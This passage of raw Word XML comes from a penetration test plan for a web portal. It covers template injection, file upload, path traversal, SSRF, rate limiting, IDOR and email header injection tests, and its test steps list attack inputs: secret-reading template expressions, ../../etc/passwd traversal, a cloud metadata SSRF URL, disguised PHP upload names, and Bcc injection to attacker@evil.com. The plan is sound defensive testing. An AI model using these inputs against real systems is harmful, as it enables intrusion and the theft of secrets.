                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Visit /badges and confirm no malicious script executes.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The system must reject raw script tags and store only the four allowed fields: data-share-badge-id, data-iframe-width, data-iframe-height, data-share-badge-host. The badge host must be validated against the allowlist (credly.com only). Public badge page must not execute injected scripts.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browser DevTools, manual input testing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PT-INJ-005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Server-Side Template Injection (SSTI) — Proposal Generator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CR-04 Module C — FR-127, FR-128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user inputs submitted via the proposal form are not processed as template expressions in the PDF generation engine.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Submit the proposal form with 'Contact Name': {{7*7}} and observe if '49' appears in the generated PDF.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Try: ${7*7}, #{7*7}, &lt;% 7*7 %&gt; in all free-text fields.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">In 'Additional Notes', enter: {{process.env.DATABASE_URL}}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">In 'Organisation Name', enter: {{config.secretKey}}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the generated PDF renders these as literal strings, not evaluated expressions.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template-like expressions must render as literal text in the PDF. No server-side evaluation of user input must occur. Environment variables and internal config must not be exposed via PDF output.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manual form submission, PDF content inspection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4513" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3  File &amp; PDF Security</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PT-FILE-001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Malicious File Upload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Downloads Module — FR-27, FR-28, SRS §5.6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admin file upload endpoint rejects malicious file types and validates MIME type and extension.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As admin, attempt to upload a .php file renamed as .pdf (e.g., shell.php.pdf).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt to upload an SVG file containing embedded JavaScript: &lt;svg&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/svg&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt to upload a file with a null-byte in the name: malware.php%00.pdf</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt to upload a valid-looking PDF containing embedded JavaScript.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify that uploaded files are stored with randomised names and not in a publicly-guessable path.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify that Content-Disposition: attachment is set on download responses.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Only PDF files must be accepted. MIME type must be validated server-side (not just client-side). Files must be stored with random names. Download responses must set Content-Disposition: attachment to prevent browser execution. SVG and script-embedded files must be rejected.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manual upload testing, curl</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PT-FILE-002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Path Traversal in File Download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Downloads Module — FR-29, FR-30 / File Storage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file download URLs cannot be manipulated to traverse the directory structure and expose sensitive server files.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Capture a file download URL from /downloads.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Modify the file ID or path parameter: ?file=../../../../etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Try encoded variants: %2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt to access other users' private files by modifying UUID in the URL.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify that the file_url field in the database does not store relative paths.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file access must be validated against a whitelist of allowed paths or via signed URLs from cloud storage. Path traversal patterns must be rejected with HTTP 400. Private files must not be accessible without admin authentication.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curl, manual URL manipulation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PT-FILE-003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PDF Generation — SSRF &amp; Path Exposure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CR-04 Module A — FR-102, NFR 12.1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server-side PDF generation endpoint cannot be used to make internal network requests (SSRF) or expose internal file paths.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Trigger PDF generation via GET /api/profile/download-pdf?type=summary</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Monitor the PDF for any embedded URLs, internal IPs, or server paths in metadata.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">If Puppeteer is used, attempt to inject a URL into a profile field that triggers a render of an internal URL: &lt;img src='http://169.254.169.254/latest/meta-data/'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Inspect generated PDF metadata for file system paths.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify that the endpoint does not return internal error stack traces on failure.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PDF generation must not make requests to internal IPs or cloud metadata endpoints. Generated PDFs must not contain server file paths in metadata. Error responses must be generic without stack traces.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exiftool (PDF metadata), manual testing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00"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">4.4  Rate Limiting &amp; Business Logic</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PT-RATE-001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Rate Limiting — Event Registration (CR-03)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CR-03 — FR-71, NFR 8.1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POST /api/event/register enforces rate limiting (max 10 per IP per hour) and the 24-hour duplicate email cooldown.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Submit 11 registration requests from the same IP within 1 hour.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify HTTP 429 is returned on the 11th request.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Submit a valid registration for email test@example.com.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediately re-submit the same email — verify the duplicate cooldown message is shown.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt to bypass the cooldown by modifying the email to TEST@example.com (case sensitivity test).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt to bypass rate limiting using X-Forwarded-For header spoofing.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Rate limit of 10/hour per IP must be enforced server-side (not relying on IP headers from untrusted proxy). Duplicate email check must be case-insensitive. HTTP 429 with a Retry-After header must be returned.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Intruder, curl, Postman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PT-RATE-002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Proposal Duplicate Submission Bypass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CR-04 Module C — FR-137, NFR 12.1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48-hour duplicate proposal submission cooldown cannot be bypassed by email manipulation or concurrent submissions.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Submit a proposal from email client@company.com.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediately re-submit from the same email — verify block.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Try sub-addressing bypass: client+test@company.com.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Try unicode normalisation bypass: clieñt@company.com.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Submit two identical requests in parallel (race condition test) to check if both are accepted.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify admin can see both if a race condition exists.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Both sub-addressing variants and unicode-normalised emails should be treated as distinct only if they genuinely differ at the domain level. Race condition must not allow two proposals from identical emails. The cooldown_hours setting must be respected.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Turbo Intruder (race conditions), curl</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PT-RATE-003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Consent Flag Bypass (CR-03,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CR-03 FR-70, CR-04 Module D — FR-139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consent flag cannot be bypassed by directly submitting API requests without setting consent_flag to true.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Submit POST /api/event/register with consent_flag: false in the request body.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Submit POST /api/event/register without the consent_flag field entirely.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Submit POST /api/proposal/submit with consent_flag: null.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Submit POST /api/contact/submit without a consent field.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify that no lead record is created in the database when consent is not given.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form submission API endpoints must validate consent_flag server-side. Requests with consent_flag != true must return HTTP 400 Bad Request. No records must be written to the database without consent. The consent requirement must not be enforced only at the client/UI layer.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Postman, curl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8B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">4.5  IDOR &amp; Access Control</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PT-IDOR-001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IDOR — Class Registrations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Reg. Mgmt — FR-19, SRS §5.4 + §7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an authenticated admin cannot access registration data for class IDs that do not belong to the portal, and that the class UUID cannot be enumerated.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As admin, call GET /api/classes/{valid_id}/registrations.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Increment/decrement integer IDs (if sequential IDs are used — this would also be a finding).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Try UUIDs of deleted classes.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Try a randomly generated UUID: GET /api/classes/00000000-0000-0000-0000-000000000001/registrations</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify that 404 (not 403) is returned for non-existent classes (to prevent enumeration).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UUIDs must be used (not sequential integers — per SRS convention). Non-existent class IDs must return HTTP 404. No cross-tenant data leakage is possible in a single-tenant system, but unauthorised ID guessing must yield no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curl, Postman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PT-IDOR-002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IDOR — Lead Pipeline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CR-04 Module D — FR-149, FR-150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lead pipeline records can only be accessed and modified by the authenticated admin, and that IDs cannot be guessed to access other records.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As admin, retrieve a lead ID from GET /api/admin/pipeline.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Modify the last character of the UUID and attempt GET /api/admin/pipeline/{modified_id}.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">As an unauthenticated user, attempt GET /api/admin/pipeline.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt PATCH /api/admin/pipeline/{id} without authentication.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify that pagination cursors do not expose internal record IDs.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Unauthenticated requests must return HTTP 401. Modified UUIDs must return HTTP 404. All pipeline write operations (PATCH status, add notes) must require a valid admin session.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curl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00"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">4.6  Email &amp; Third-Party Integration</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PT-EMAIL-001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Email Header Injection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CR-04 Module D — FR-141, FR-153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user-supplied fields (name, email, organisation) used in outgoing emails cannot inject additional email headers to redirect or forge emails.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Submit a proposal with Contact Name: Test\nBcc: attacker@evil.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Submit with Email: victim@test.com\nTo: attacker@evil.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Submit with Organisation: ACME\r\nSubject: Injected Subject</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Monitor outgoing email (via Resend/SendGrid dashboard or email log) to verify no injected headers appear.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
